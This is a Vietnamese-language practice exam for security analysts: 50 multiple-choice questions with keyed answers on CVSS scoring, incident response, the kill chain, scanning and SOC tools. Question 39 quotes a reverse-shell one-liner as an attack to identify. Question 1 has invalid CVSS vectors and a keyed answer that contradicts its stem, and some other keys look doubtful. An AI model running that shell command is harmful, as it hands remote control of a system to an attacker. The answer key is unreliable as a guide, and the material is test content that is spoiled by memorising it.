Câu 1:
Một lỗ hổng zero-day gần đây đang bị khai thác tích cực, không yêu cầu tương tác của người dùng hoặc leo thang đặc quyền và có tác động đáng kể đến tính bảo mật và toàn vẹn nhưng không ảnh hưởng đến tính khả dụng. Chỉ số CVE nào sau đây sẽ chính xác nhất cho mối đe dọa zero-day này?
A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Đáp án: A
Câu 2:
Công cụ nào sau đây sẽ hoạt động tốt nhất để ngăn chặn việc lộ PII ra bên ngoài tổ chức?
A. PAM
B. IDS
C. PKI
D. DLP
Đáp án: D
Câu 3:
Một tổ chức đã tiến hành đánh giá lỗ hổng ứng dụng web đối với trang web của công ty và quan sát thấy kết quả sau: (ảnh chụp màn hình hiển thị các cảnh báo về lỗ hổng bảo mật, bao gồm cả cấu hình sai miền chéo)
Đề xuất điều chỉnh nào sau đây mà chuyên viên phân tích bảo mật nên chia sẻ?
A. Đặt cờ HttpOnly để buộc giao tiếp bằng HTTPS
B. Chặn các yêu cầu không có tiêu đề X-Frame-Options
C. Cấu hình tiêu đề Access-Control-Allow-Origin cho các miền được ủy quyền
D. Vô hiệu hóa tiêu đề chia sẻ tài nguyên nguồn gốc chéo
Đáp án: C
Câu 4:
Những mục nào sau đây nên được đưa vào báo cáo quét lỗ hổng? (Chọn hai.)
A. Bài học kinh nghiệm
B. Thỏa thuận cấp độ dịch vụ
C. Sách lược
D. Máy chủ bị ảnh hưởng
E. Điểm rủi ro
F. Kế hoạch đào tạo
Đáp án: DE
Câu 5:
Giám đốc điều hành của một tổ chức gần đây đã nghe nói rằng việc khai thác các cuộc tấn công mới trong ngành đang diễn ra khoảng 45 ngày sau khi bản vá được phát hành. Điều nào sau đây sẽ bảo vệ tốt nhất tổ chức này?
A. Thời gian khắc phục trung bình là 30 ngày
B. Thời gian phát hiện trung bình là 45 ngày
C. Thời gian phản hồi trung bình là 15 ngày
D. Kiểm tra ứng dụng của bên thứ ba
Đáp án: A
Câu 6:
Một chuyên viên phân tích bảo mật gần đây đã tham gia nhóm và đang cố gắng xác định ngôn ngữ kịch bản nào đang được sử dụng trong kịch bản sản xuất để xác định xem nó có độc hại hay không. Với kịch bản sau: (đoạn mã PowerShell)
Ngôn ngữ kịch bản nào sau đây đã được sử dụng trong kịch bản?
A. PowerShell
B. Ruby
C. Python
D. Kịch bản Shell
Đáp án: A
Câu 7:
Tài khoản người dùng của công ty đã bị xâm phạm. Người dùng cũng báo cáo rằng cổng thông tin nội bộ của công ty đôi khi chỉ có thể truy cập được thông qua HTTP, đôi khi; nó có thể truy cập được thông qua HTTPS. Điều nào sau đây có khả năng mô tả hoạt động được quan sát thấy nhất?
A. Có sự cố với chứng chỉ SSL khiến cổng 443 không khả dụng cho quyền truy cập HTTPS
B. Một cuộc tấn công trên đường dẫn đang được thực hiện bởi ai đó có quyền truy cập nội bộ buộc người dùng vào cổng 80
C. Máy chủ web không thể xử lý số lượng yêu cầu HTTPS ngày càng tăng nên nó chuyển tiếp người dùng đến cổng 80
D. Lỗi do BGP gây ra do các quy tắc mới được áp dụng trên các bộ định tuyến nội bộ của công ty
Đáp án: B
Câu 8:
Một chuyên viên phân tích bảo mật được giao nhiệm vụ ưu tiên các lỗ hổng để khắc phục. Các chính sách bảo mật có liên quan của công ty được hiển thị bên dưới:
- Chính sách bảo mật 1006: Quản lý lỗ hổng
- Công ty sẽ sử dụng Chỉ số Điểm Cơ bản CVSSv3.1 (Khả năng khai thác và Tác động) để ưu tiên việc khắc phục các lỗ hổng bảo mật.
- Trong các trường hợp phải lựa chọn giữa tính bảo mật và tính khả dụng, Công ty sẽ ưu tiên tính bảo mật của dữ liệu hơn tính khả dụng của hệ thống và dữ liệu.
- Công ty sẽ ưu tiên vá các hệ thống và dịch vụ có sẵn công khai hơn vá các hệ thống có sẵn nội bộ.
Theo chính sách bảo mật, lỗ hổng nào sau đây nên được ưu tiên vá cao nhất?
A. Tên: THOR.HAMMER – CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (Hệ thống nội bộ)
B. Tên: CAP.SHIELD – CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (Hệ thống bên ngoài)
C. Tên: LOKI.DAGGER – CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (Hệ thống bên ngoài)
D. Tên: THANOS.GAUNTLET – CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (Hệ thống nội bộ)
Đáp án: B
Câu 9:
Điều nào sau đây sẽ đảm bảo nhất rằng các dịch vụ quan trọng có sẵn trong trường hợp xảy ra sự cố?
A. Kế hoạch liên tục kinh doanh
B. Kế hoạch quản lý lỗ hổng
C. Kế hoạch khắc phục thảm họa
D. Kế hoạch quản lý tài sản
Đáp án: A
Câu 10:
Giám đốc an ninh thông tin muốn loại bỏ và giảm CNTT ngầm trong doanh nghiệp. Một số ứng dụng đám mây có rủi ro cao được sử dụng làm tăng rủi ro cho tổ chức. Giải pháp nào sau đây sẽ hỗ trợ giảm rủi ro?
A. Triển khai CASB và bật thực thi chính sách
B. Cấu hình MFA với quyền truy cập nghiêm ngặt
C. Triển khai cổng API
D. Bật SSO cho các ứng dụng đám mây
Đáp án: A
Câu 11:
Một nhóm phản ứng sự cố nhận được cảnh báo để bắt đầu điều tra về sự cố mất internet. Sự cố đang ngăn tất cả người dùng ở nhiều vị trí truy cập các tài nguyên SaaS bên ngoài. Nhóm xác định rằng tổ chức đã bị ảnh hưởng bởi một cuộc tấn công DDoS. Nhóm nên xem xét nhật ký nào sau đây trước tiên?
A. CDN
B. Máy quét lỗ hổng
C. DNS
D. Máy chủ web
Đáp án: C
Câu 12:
Một kẻ tấn công độc hại đã truy cập vào mạng nội bộ bằng phương tiện kỹ thuật xã hội. Kẻ tấn công không muốn mất quyền truy cập để tiếp tục cuộc tấn công. Điều nào sau đây mô tả rõ nhất giai đoạn hiện tại của Chuỗi Giết người trên mạng mà kẻ tấn công đang hoạt động?
A. Vũ khí hóa
B. Trinh sát
C. Phân phối
D. Khai thác
Đáp án: D
Câu 13:
Một nhà phân tích phát hiện ra rằng một địa chỉ IP bên ngoài mạng công ty đang được sử dụng để chạy quét mạng và lỗ hổng trên các tài sản hướng ra bên ngoài. Nhà phân tích đang chứng kiến bước nào sau đây của khuôn khổ tấn công?
A. Khai thác
B. Trinh sát
C. Chỉ huy và kiểm soát
D. Hành động theo mục tiêu
Đáp án: B
Câu 14:
Một nhà phân tích phản ứng sự cố nhận thấy nhiều email đi qua mạng chỉ nhắm mục tiêu vào quản trị viên của công ty. Email chứa URL bị che giấu dẫn đến một trang web không xác định ở một quốc gia khác. Điều nào sau đây mô tả rõ nhất những gì đang xảy ra? (Chọn hai.)
A. Beaconing
B. Chiếm quyền Hệ thống Tên miền
C. Tấn công social engineering
D. Tấn công trên đường dẫn
E. Liên kết bị xáo trộn
F. Ngộ độc Giao thức phân giải địa chỉ
Đáp án: CE
Câu 15:
Trong quá trình quét bảo mật, chuyên viên phân tích bảo mật thường xuyên tìm thấy các lỗ hổng tương tự trong một ứng dụng quan trọng. Đề xuất nào sau đây sẽ giảm thiểu tốt nhất vấn đề này nếu được áp dụng cùng với giai đoạn SDLC?
A. Thường xuyên tiến hành các bài tập nhóm đỏ trên ứng dụng trong quá trình sản xuất
B. Đảm bảo rằng tất cả các thư viện mã hóa đã triển khai đều được kiểm tra thường xuyên
C. Sử dụng quét bảo mật ứng dụng như một phần của đường ống cho dòng CI/CD
D. Thực hiện xác thực đầu vào phù hợp cho bất kỳ biểu mẫu nhập dữ liệu nào
Đáp án: C
Câu 16:
Một nhà phân tích đang xem xét báo cáo lỗ hổng và phải đưa ra các khuyến nghị cho nhóm điều hành. Nhà phân tích thấy rằng hầu hết các hệ thống đều có thể được nâng cấp bằng cách khởi động lại dẫn đến một cửa sổ thời gian chết duy nhất. Tuy nhiên, hai trong số các hệ thống quan trọng không thể được nâng cấp do thiết bị của nhà cung cấp mà công ty không có quyền truy cập. Những yếu tố cản trở việc khắc phục nào sau đây mà các hệ thống này và các lỗ hổng liên quan thể hiện rõ nhất?
A. Hệ thống độc quyền
B. Hệ thống cũ
C. Hệ điều hành không được hỗ trợ
D. Thiếu cửa sổ bảo trì
Đáp án: A
Câu 17:
Nhóm bảo mật xem xét máy chủ web cho XSS và chạy quét Nmap sau: (đoạn mã Nmap)
Điều nào sau đây mô tả chính xác nhất kết quả của quá trình quét?
A. Đầu ra của các ký tự > và ” làm tham số được sử dụng trong nỗ lực
B. Tham số ID dễ bị tấn công http://172.31.15.2/1.php?id-2 và các ký tự không được lọc trả về
C. Tham số dễ bị tấn công và các ký tự không được lọc hoặc được mã hóa được chuyển thành > và ” là không an toàn
D. Tham số dễ bị tấn công và các ký tự > và ” với nỗ lực XSS phản xạ
Đáp án: D
Câu 18:
Hành động tốt nhất nên thực hiện sau khi kết thúc sự cố bảo mật để cải thiện phản ứng sự cố trong tương lai là gì?
A. Phát triển cây gọi để thông báo cho người dùng bị ảnh hưởng
B. Lên lịch xem xét với tất cả các nhóm để thảo luận về những gì đã xảy ra
C. Tạo tóm tắt điều hành để cập nhật cho lãnh đạo công ty
D. Xem xét tuân thủ quy định với quan hệ công chúng để thông báo chính thức
Đáp án: B
Câu 19:
Một chuyên viên phân tích bảo mật đã nhận được một tệp nhị phân độc hại để phân tích. Kỹ thuật nào sau đây là tốt nhất để thực hiện phân tích?
A. Phân tích mã
B. Phân tích tĩnh
C. Kỹ thuật đảo ngược
D. Fuzzing
Đáp án: C
Câu 20:
Một nhóm phản ứng sự cố đã tìm thấy IoC trong một máy chủ quan trọng. Nhóm cần cách ly và thu thập bằng chứng kỹ thuật để điều tra thêm. Dữ liệu nào sau đây nên được thu thập trước tiên để bảo toàn thông tin nhạy cảm trước khi cách ly máy chủ?
A. Ổ cứng
B. Phân vùng khởi động chính
C. Tệp độc hại
D. Bảng định tuyến
E. Địa chỉ IP tĩnh
Đáp án: D
Câu 21:
Nhiệm vụ vận hành bảo mật nào sau đây là lý tưởng cho tự động hóa?
A. Phân tích tệp đáng ngờ: (Mô tả quy trình thủ công)
B. Hành động chặn IoC tường lửa: (Mô tả quy trình thủ công)
C. Lỗi người dùng ứng dụng bảo mật: (Mô tả quy trình thủ công)
D. Phân tích tiêu đề email: (Mô tả quy trình tự động)
Đáp án: D
Câu 22:
Một tổ chức đã bị vi phạm giao dịch của khách hàng. Theo các điều khoản của PCI DSS, tổ chức nên báo cáo vi phạm cho nhóm nào sau đây?
A. Hội đồng Tiêu chuẩn Bảo mật PCI
B. Cơ quan thực thi pháp luật địa phương
C. Cơ quan thực thi pháp luật liên bang
D. Nhà phát hành thẻ
Đáp án: D
Câu 23:
Chỉ số nào sau đây là chỉ số tốt nhất để một tổ chức tập trung vào các khoản đầu tư gần đây vào SIEM, SOAR và hệ thống bán vé?
A. Thời gian phát hiện trung bình
B. Số lượng khai thác theo chiến thuật
C. Khối lượng cảnh báo
D. Số lượng nỗ lực xâm nhập
Đáp án: A
Câu 24:
Một công ty đang triển khai chương trình quản lý lỗ hổng và chuyển từ môi trường tại chỗ sang môi trường đám mây IaaS lai. Hàm ý nào sau đây nên được xem xét trên môi trường lai mới?
A. Nên di chuyển các máy quét hiện tại lên đám mây
B. Các cấu hình sai cụ thể của đám mây có thể không bị phát hiện bởi các máy quét hiện tại
C. Các máy quét lỗ hổng hiện có không thể quét hệ thống IaaS
D. Nên thực hiện quét lỗ hổng trên môi trường đám mây từ đám mây
Đáp án: B
Câu 25:
Cảnh báo bảo mật được kích hoạt khi người dùng cuối cố gắng truy cập trang web không được phép theo chính sách của tổ chức. Vì hành động này được coi là hành vi phạm tội có thể chấm dứt, nhà phân tích SOC thu thập nhật ký xác thực, nhật ký web và tệp tạm thời, phản ánh các tìm kiếm trên web từ máy trạm của người dùng, để xây dựng trường hợp cho cuộc điều tra. Cách nào sau đây là tốt nhất để đảm bảo rằng cuộc điều tra tuân thủ các chính sách nhân sự hoặc quyền riêng tư?
A. Tạo dòng thời gian các sự kiện nêu chi tiết dấu thời gian, tên máy chủ tài khoản người dùng và thông tin IP được liên kết với các hoạt động
B. Đảm bảo rằng chi tiết vụ án không phản ánh bất kỳ thông tin nhận dạng cá nhân nào Bảo vệ bằng mật khẩu bằng chứng và hạn chế quyền truy cập đối với nhân sự liên quan đến cuộc điều tra
C. Tạo tên mã cho cuộc điều tra trong hệ thống bán vé để tất cả nhân sự có quyền truy cập sẽ không thể dễ dàng xác định vụ án là cuộc điều tra liên quan đến nhân sự
D. Thông báo cho người quản lý SOC để biết sau khi xác nhận rằng hoạt động là cố ý
Đáp án: B
Câu 26:
Bước đầu tiên nên thực hiện khi thiết lập kế hoạch khắc phục thảm họa là gì?
A. Đồng ý về các mục tiêu và mục tiêu của kế hoạch
B. Xác định địa điểm sẽ được sử dụng trong thời gian xảy ra thảm họa
C. Thể hiện sự tuân thủ quy trình khắc phục thảm họa tiêu chuẩn
D. Xác định các ứng dụng sẽ được chạy trong thời gian xảy ra thảm họa
Đáp án: A
Câu 27:
Kỹ thuật viên xác định lỗ hổng trên máy chủ và áp dụng bản vá phần mềm. Bước tiếp theo trong quy trình khắc phục nên là gì?
A. Kiểm tra
B. Triển khai
C. Xác thực
D. Khôi phục
Đáp án: C
Câu 28:
Nhà phân tích xem xét mục nhập nhật ký điểm cuối sau: (đoạn mã PowerShell)
Điều nào sau đây đã xảy ra?
A. Thay đổi Registry
B. Đổi tên máy tính
C. Tài khoản mới được giới thiệu
D. Leo thang đặc quyền
Đáp án: C
Câu 29:
Chương trình bảo mật đã có thể đạt được cải thiện 30% MTTR bằng cách tích hợp các biện pháp kiểm soát bảo mật vào SIEM. Nhà phân tích không còn phải nhảy giữa các công cụ. Điều nào sau đây mô tả rõ nhất những gì chương trình bảo mật đã làm?
A. Làm giàu dữ liệu
B. Mặt phẳng kiểm soát bảo mật
C. Kết hợp nguồn cấp dữ liệu mối đe dọa
D. Bảng điều khiển đơn
Đáp án: D
Câu 30:
Do có báo cáo về hoạt động trái phép đang xảy ra trên mạng nội bộ, một nhà phân tích đang thực hiện khám phá mạng. Nhà phân tích chạy quét Nmap trên mạng công ty để đánh giá thiết bị nào đang hoạt động trong môi trường. Với kết quả sau: (đầu ra Nmap)
Lựa chọn nào sau đây mà nhà phân tích nên xem xét trước tiên?
A. wh4dc-748gy.lan (192.168.86.152)
B. officerckuplayer.lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)
Đáp án: E
Câu 31:
Khi bắt đầu một cuộc điều tra, điều nào sau đây phải được thực hiện trước tiên?
A. Thông báo cho cơ quan thực thi pháp luật
B. Bảo vệ hiện trường
C. Thu thập tất cả bằng chứng liên quan
D. Phỏng vấn các nhân chứng
Đáp án: B
Câu 32:
Điều nào sau đây mô tả cách trưởng nhóm CSIRT xác định ai nên được liên lạc và khi nào trong thời gian xảy ra sự cố bảo mật?
A. Trưởng nhóm nên xem xét những gì được ghi lại trong chính sách hoặc kế hoạch ứng phó sự cố
B. Các thành viên cấp quản lý của CSIRT nên đưa ra quyết định đó
C. Trưởng nhóm có quyền quyết định liên lạc với ai vào bất kỳ lúc nào
D. Các chuyên gia về vấn đề trong nhóm nên liên lạc với những người khác trong lĩnh vực chuyên môn cụ thể
Đáp án: A
Câu 33:
Một chuyên viên phân tích an ninh mạng mới được giao nhiệm vụ tạo một cuộc họp ngắn điều hành về các mối đe dọa có thể xảy ra đối với tổ chức. Điều nào sau đây sẽ tạo ra dữ liệu cần thiết cho cuộc họp ngắn?
A. Nhật ký tường lửa
B. Chỉ báo thỏa hiệp
C. Đánh giá rủi ro
D. Danh sách kiểm soát truy cập
Đáp án: C
Câu 34:
Một nhà phân tích nhận thấy có một thiết bị nội bộ gửi lưu lượng HTTPS với các ký tự bổ sung trong tiêu đề đến IP độc hại đã biết ở một quốc gia khác. Điều nào sau đây mô tả những gì nhà phân tích đã nhận thấy?
A. Beaconing
B. Kịch bản chéo trang
C. Tràn bộ nhớ đệm
D. Vượt qua PHP
Đáp án: A
Câu 35:
Một chuyên viên phân tích bảo mật đang xem xét chụp gói tin trong Wireshark có chứa phiên FTP từ máy có khả năng bị xâm nhập. Chuyên viên phân tích đặt bộ lọc hiển thị sau: ftp. Chuyên viên phân tích có thể thấy có một số yêu cầu RETR với phản hồi Hoàn tất chuyển 226, nhưng ngăn danh sách gói tin không hiển thị các gói tin chứa chính tệp chuyển. Chuyên viên phân tích có thể thực hiện điều nào sau đây để xem toàn bộ nội dung của các tệp đã tải xuống?
A. Thay đổi bộ lọc hiển thị thành ftp.active.port
B. Thay đổi bộ lọc hiển thị thành tcp.port==20
C. Thay đổi bộ lọc hiển thị thành ftp-data và theo dõi luồng TCP
D. Điều hướng đến menu Tệp và chọn FTP từ tùy chọn Xuất đối tượng
Đáp án: C
Câu 36:
Người quản lý SOC nhận được cuộc gọi từ khách hàng không hài lòng. Khách hàng đã nhận được báo cáo lỗ hổng hai giờ trước: nhưng báo cáo không có phản hồi khắc phục tiếp theo từ nhà phân tích. Người quản lý SOC nên xem xét tài liệu nào sau đây để đảm bảo nhóm đang đáp ứng các nghĩa vụ hợp đồng phù hợp cho khách hàng?
A. SLA
B. MOU
C. NDA
D. Hạn chế trách nhiệm
Đáp án: A
Câu 37:
Giai đoạn nào sau đây của Chuỗi Giết người trên mạng liên quan đến kẻ tấn công cố gắng thiết lập giao tiếp với mục tiêu đã bị khai thác thành công?
A. Chỉ huy và kiểm soát
B. Hành động theo mục tiêu
C. Khai thác
D. Phân phối
Đáp án: A
Câu 38:
Một công ty có lực lượng lao động đa dạng về mặt địa lý và IP động muốn triển khai phương pháp quét lỗ hổng với lưu lượng mạng giảm. Điều nào sau đây sẽ đáp ứng tốt nhất yêu cầu này?
A. Bên ngoài
B. Dựa trên tác nhân
C. Không có chứng chỉ
D. Có chứng chỉ
Đáp án: B
Câu 39:
Một chuyên viên phân tích bảo mật phát hiện nỗ lực khai thác chứa lệnh sau: sh -i >& /dev/udp/10.1.1.1/4821 0>$1
Điều nào sau đây đang được thử?
A. RCE
B. Reverse shell
C. XSS
D. Tiêm SQL
Đáp án: B
Câu 40:
CVE cũ hơn có điểm lỗ hổng là 7.1 đã được nâng lên điểm 9.8 do có một khai thác được sử dụng rộng rãi để phân phối ransomware. Yếu tố nào sau đây mà nhà phân tích có khả năng giao tiếp nhất là lý do cho sự leo thang này?
A. Phạm vi
B. Vũ khí hóa
C. CVSS
D. Giá trị tài sản
Đáp án: B
Câu 41:
Nhà phân tích đang xem xét báo cáo lỗ hổng cho môi trường máy chủ với các mục sau: (bảng)
Hệ thống nào sau đây nên được ưu tiên vá trước?
A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228
Đáp án: D
Câu 42:
Một công ty đang trong quá trình triển khai chương trình quản lý lỗ hổng và có những lo ngại về việc cấp quyền truy cập dữ liệu nhạy cảm cho nhóm bảo mật. Phương pháp quét nào sau đây có thể được triển khai để giảm quyền truy cập vào hệ thống trong khi vẫn cung cấp kết quả quét lỗ hổng chính xác nhất?
A. Quét mạng có chứng chỉ
B. Quét thụ động
C. Quét dựa trên tác nhân
D. Quét động
Đáp án: C
Câu 43:
Chuyên viên phân tích bảo mật đang cố gắng xác định các điểm bất thường trên định tuyến mạng. Chuyên viên phân tích có thể sử dụng hàm nào sau đây trên tập lệnh shell để đạt được mục tiêu một cách chính xác nhất?
A. (hàm shell)
B. (hàm shell)
C. (hàm shell)
D. (hàm shell)
Đáp án: D
Câu 44:
Có một số báo cáo về việc thông tin nhạy cảm bị tiết lộ thông qua các dịch vụ chia sẻ tệp. Công ty muốn cải thiện tư thế bảo mật của mình trước mối đe dọa này. Biện pháp kiểm soát bảo mật nào sau đây sẽ hỗ trợ tốt nhất công ty trong tình huống này?
A. Triển khai xác thực tăng cường cho quản trị viên
B. Cải thiện đào tạo và nhận thức của nhân viên
C. Tăng tiêu chuẩn độ phức tạp của mật khẩu
D. Triển khai quản lý thiết bị di động
Đáp án: B
Câu 45:
Cách nào sau đây là tốt nhất để bắt đầu chuẩn bị cho báo cáo có tiêu đề “Những gì chúng ta đã học được” liên quan đến sự cố gần đây liên quan đến vi phạm an ninh mạng?
A. Xác định mức độ tinh vi của đối tượng mà báo cáo hướng đến
B. Bao gồm các tài liệu tham khảo và nguồn thông tin trên trang đầu tiên
C. Bao gồm mục lục nêu ra toàn bộ báo cáo
D. Quyết định về bảng màu sẽ giao tiếp hiệu quả các chỉ số
Đáp án: A
Câu 46:
Một chuyên viên phân tích bảo mật đang thực hiện một cuộc điều tra liên quan đến nhiều tệp nhị phân phần mềm độc hại Windows được nhắm mục tiêu. Nhà phân tích muốn thu thập thông tin tình báo mà không tiết lộ thông tin cho kẻ tấn công. Hành động nào sau đây sẽ cho phép nhà phân tích đạt được mục tiêu?
A. Tải tệp nhị phân lên hộp cát air gapped để phân tích
B. Gửi tệp nhị phân cho nhà cung cấp phần mềm diệt virus
C. Thực thi tệp nhị phân trên môi trường có kết nối internet
D. Truy vấn băm tệp bằng VirusTotal
Đáp án: A
Câu 47:
Điều nào sau đây sẽ giúp giảm thiểu sự tham gia của con người và hỗ trợ cải tiến quy trình trong hoạt động bảo mật?
A. OSSTMM
B. SIEM
C. SOAR
D. OWASP
Đáp án: C
Câu 48:
Sau khi tiến hành đánh giá rủi ro an ninh mạng cho yêu cầu phần mềm mới, Giám đốc An ninh Thông tin (CISO) quyết định rằng điểm rủi ro sẽ quá cao. CISO đã từ chối yêu cầu phần mềm. Nguyên tắc quản lý rủi ro nào sau đây mà CISO đã chọn?
A. Tránh
B. Chuyển giao
C. Chấp nhận
D. Giảm thiểu
Đáp án: A
Câu 49:
Khía cạnh quan trọng nào sau đây nên được đưa vào bước rút kinh nghiệm sau sự cố?
A. Xác định bất kỳ cải tiến hoặc thay đổi nào trong kế hoạch hoặc quy trình ứng phó sự cố
B. Xác định xem có lỗi nội bộ nào xảy ra hay không và ai đã làm điều đó để họ không lặp lại lỗi
C. Trình bày tất cả bằng chứng pháp lý được thu thập và chuyển giao cho cơ quan thực thi pháp luật
D. Thảo luận về tác động tài chính của sự cố để xác định xem các biện pháp kiểm soát bảo mật có được chi tiêu tốt hay không
Đáp án: A
Câu 50:
Nhóm vận hành bảo mật được yêu cầu hợp nhất một số nguồn cấp dữ liệu thông tin tình báo về mối đe dọa do các công cụ và cổng thông tin dư thừa. Điều nào sau đây sẽ đạt được mục tiêu tốt nhất và tối đa hóa kết quả?
A. Bảng điều khiển đơn
B. Đăng nhập một lần
C. Làm giàu dữ liệu
D. Loại bỏ trùng lặp
Đáp án: A
Để lại một bình luận